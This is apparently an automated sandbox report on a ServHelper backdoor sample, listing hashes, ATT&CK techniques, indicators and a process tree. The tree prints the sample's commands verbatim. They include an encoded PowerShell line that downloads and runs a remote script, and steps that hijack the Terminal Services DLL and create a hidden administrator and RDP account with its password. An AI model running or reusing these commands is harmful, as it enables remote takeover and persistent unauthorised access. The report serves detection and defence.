servhelper | 3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b

Analysis

max time kernel
140s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 10:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe
Size

7.6MB
MD5

88e8fd31d8e8a76cd57c9051ed96ee66
SHA1

86712df63cf56ae014d91f1f276ea4491c115a8e
SHA256

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b
SHA512

af5c924b3c3181b4720ec9d1d0e757ceb9a4d0371cfb9c0a22da08fd77d2324dc0e716cc0fa5ea3d7981256ce772c4327d04a9e2954de654cd07851514a610f9
SSDEEP

98304:OsgijX8uqOeLajSKF6ZKHiT431RArwISOskLPJaGiZak2mzhLS:RjsuxeLQr6KiT4PArwPOsGJaG6ak1ZS

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2484 powershell.exe
6 2484 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2376 icacls.exe
2128 icacls.exe
392 icacls.exe
2280 takeown.exe
2072 icacls.exe
2320 icacls.exe
2864 icacls.exe
2436 icacls.exe

flow	pid	process
5	2484	powershell.exe
6	2484	powershell.exe

pid	process
2376	icacls.exe
2128	icacls.exe
392	icacls.exe
2280	takeown.exe
2072	icacls.exe
2320	icacls.exe
2864	icacls.exe
2436	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

412
412
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2376 icacls.exe
2128 icacls.exe
392 icacls.exe
2280 takeown.exe
2072 icacls.exe
2320 icacls.exe
2864 icacls.exe
2436 icacls.exe

pid	process
412
412

pid	process
2376	icacls.exe
2128	icacls.exe
392	icacls.exe
2280	takeown.exe
2072	icacls.exe
2320	icacls.exe
2864	icacls.exe
2436	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WAFQEKNU4A5R23JQTENZ.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2164 WMIC.exe

pid	process
2164	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00ab14ed318bda01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

780 reg.exe
Runs net.exe

pid	process
780	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2680	powershell.exe
2532	powershell.exe
2788	powershell.exe
1948	powershell.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
2484	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

480
412
412
412
412
412

pid	process
480
412
412
412
412
412

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeRestorePrivilege	2320	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2164	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2164	WMIC.exe
Token: SeAuditPrivilege	2164	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2164	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2164	WMIC.exe
Token: SeAuditPrivilege	2164	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2008	WMIC.exe
Token: SeAuditPrivilege	2008	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2008	WMIC.exe
Token: SeAuditPrivilege	2008	WMIC.exe
Token: SeDebugPrivilege	2484	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2360 wrote to memory of 2680	2360	3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe	powershell.exe
PID 2360 wrote to memory of 2680	2360	3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe	powershell.exe
PID 2360 wrote to memory of 2680	2360	3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe	powershell.exe
PID 2680 wrote to memory of 320	2680	powershell.exe	csc.exe
PID 2680 wrote to memory of 320	2680	powershell.exe	csc.exe
PID 2680 wrote to memory of 320	2680	powershell.exe	csc.exe
PID 320 wrote to memory of 2504	320	csc.exe	cvtres.exe
PID 320 wrote to memory of 2504	320	csc.exe	cvtres.exe
PID 320 wrote to memory of 2504	320	csc.exe	cvtres.exe
PID 2680 wrote to memory of 2532	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2532	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2532	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2788	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2788	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2788	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 1948	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 1948	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 1948	2680	powershell.exe	powershell.exe
PID 2680 wrote to memory of 2280	2680	powershell.exe	takeown.exe
PID 2680 wrote to memory of 2280	2680	powershell.exe	takeown.exe
PID 2680 wrote to memory of 2280	2680	powershell.exe	takeown.exe
PID 2680 wrote to memory of 2072	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2072	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2072	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2320	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2320	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2320	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2864	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2864	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2864	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2436	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2436	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2436	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2376	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2376	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2376	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2128	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2128	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 2128	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 392	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 392	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 392	2680	powershell.exe	icacls.exe
PID 2680 wrote to memory of 680	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 680	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 680	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 780	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 780	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 780	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 560	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 560	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 560	2680	powershell.exe	reg.exe
PID 2680 wrote to memory of 996	2680	powershell.exe	net.exe
PID 2680 wrote to memory of 996	2680	powershell.exe	net.exe
PID 2680 wrote to memory of 996	2680	powershell.exe	net.exe
PID 996 wrote to memory of 600	996	net.exe	net1.exe
PID 996 wrote to memory of 600	996	net.exe	net1.exe
PID 996 wrote to memory of 600	996	net.exe	net1.exe
PID 2680 wrote to memory of 1824	2680	powershell.exe	cmd.exe
PID 2680 wrote to memory of 1824	2680	powershell.exe	cmd.exe
PID 2680 wrote to memory of 1824	2680	powershell.exe	cmd.exe
PID 1824 wrote to memory of 1512	1824	cmd.exe	cmd.exe
PID 1824 wrote to memory of 1512	1824	cmd.exe	cmd.exe
PID 1824 wrote to memory of 1512	1824	cmd.exe	cmd.exe
PID 1512 wrote to memory of 1828	1512	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe
"C:\Users\Admin\AppData\Local\Temp\3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\imtngke1.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E4B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1E4A.tmp"
      4⤵
      PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2280
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2072
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2864
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2436
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2376
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2128
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:392
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:680
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:780
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:560
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1828
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2324
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:836
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:352
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1048
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1620

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1152
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1356

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc GnKYe7kP /add
1⤵
PID:1344
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc GnKYe7kP /add
  2⤵
  PID:2160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc GnKYe7kP /add
    3⤵
    PID:1032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:648
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2868

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
1⤵
PID:912
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
  2⤵
  PID:572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
    3⤵
    PID:2408

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2228
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2328

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc GnKYe7kP
1⤵
PID:1080
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc GnKYe7kP
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc GnKYe7kP
    3⤵
    PID:2264

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2952
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2164

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1744
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2008

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2580
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1E4B.tmp

Filesize
1KB

MD5
472e5ab2fb628fd4df6abc1abb8d76f4

SHA1
ee23fdf76716b1b6296a2769bea2da796667a719

SHA256
374e36ee2f42ff0e03ad834d5126daaa760fb6e3634ac2ecdc685f0ab2ebbff4

SHA512
fa4cf5f77c4a3e37c22860a8faeab99ecc0a50355ee0505763826315700d135f845a7ed300b7fea22f3b91afde461bd8f68c0315722596f59286400c19dbf284

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
f49b7639c86923a9507b594feb5df523

SHA1
e3a058aa2ae06ee0d8e1c3d47d790181651744a1

SHA256
f92f29a5e41c25e32ad83a71e9e2a54c87f91c966cb90fdd3b1289bad824b021

SHA512
c68858888ea64affa95b3e51e3d3ef43d12e8628f5a09fdb5f33319f1cb5a23df9506a2dfb797445f77cf7120e79f9d0c9ddd25a567dab81cce0c3751903c804

Download Submit
C:\Users\Admin\AppData\Local\Temp\imtngke1.dll

Filesize
3KB

MD5
dae70ac1e527982f086d8b991eeb5be8

SHA1
65a163762fe33a493e41e851dab91dfc310c30ff

SHA256
084b2c50d36d821740e706b00bb4d826315980d21354a9f4e696cd6bd6383f40

SHA512
5c9c9d525b9524eaf3b2addb9cf149b273010a65d54b76810f2a511071e20b403b241f584cc829ceeb01ad0262962758fbabfe3a000f8a566fbe16153bb57808

Download Submit
C:\Users\Admin\AppData\Local\Temp\imtngke1.pdb

Filesize
7KB

MD5
2f679aa55901aefb1845ff35bb798f40

SHA1
3ce27096667ad8b3fb5d40d30d1d7c097275d6c4

SHA256
089c9cf8ba3debde8c859e8edac6e812e300ef024cbcc2b82be81e0d731c52e4

SHA512
b87c70d7d81f368cb594461c116f993eda49ae93b9940633c60954d7076559855e5dc39e46954d2f6c073cca9d5fd455a341939a0b85327d6ef97a9ddfd2183c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38417695bde28395c0a8e9e06f9abace

SHA1
288fa1bd4e0617cc43b0e143bce5a993ea01fbeb

SHA256
07eb38e30768a791a9ac148d18ff2391c0c8aa7c5eb2e7a60f6a9c8e868c9b7a

SHA512
d406492cb313f7a8d6df56cf1a080e34fd28ccc9c95ced2c020aa7525c73fc622b63528433754e32ae0cb7f41a65cc1d0bcdf0ce02b3a832b219745ced606e5c

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1E4A.tmp

Filesize
652B

MD5
82576e67af9c9ec1171cc34bf87bf7ec

SHA1
b8d3322dba01c7c1658d9022284d4f2724407b6d

SHA256
d67de7bc7b3472ec9034ee1c6e177d0157dde14e8e8e356366faf5e82f5ef9d2

SHA512
d9e2373276daea9f7dc3d150880bbe87d6362a702cf9ad0378afc851739f29b3483007d51fd790ad414559f8d18e3e14ba26061444b9ef47578452773658227d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\imtngke1.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\imtngke1.cmdline

Filesize
309B

MD5
b5c33955563077c35647fa8bfb02c2ca

SHA1
488bbd3060c424c65e1ec8cff4a079b13f31fb4c

SHA256
fe8fad963e3e6f82b03e78739d723c4d18fdc3e2966753946b7ec2312243c740

SHA512
2aeab56d6e86efa4cbff5424fb59db10d704323c5e30033235a2f0d1542e1afc6b00514bc59fa58a8398520e0cb9e4e860d3cdb9bc46817ffdaff15957b7ba57

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
5410b592605e57a4a01c66b0a1f0d10d

SHA1
afa4acf032d537dd46e997891fc7f9bba9555679

SHA256
e39445c5f61c431be3b0ce753487e9a6439b5bfb813cf21116b77fb7d0696fa9

SHA512
4ce9816c61e58834c1713d0abcf6305d565b7a52c1d2d2f63d8b7c5b69314d959205ea70af084ef74759820114c8b938800513e0dda43d699f0454189b5fbdca

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
37b7b51385d6b857d082976c035c86e0

SHA1
c2ec7d74e7d555375cdcca0407237dd3e7db2a24

SHA256
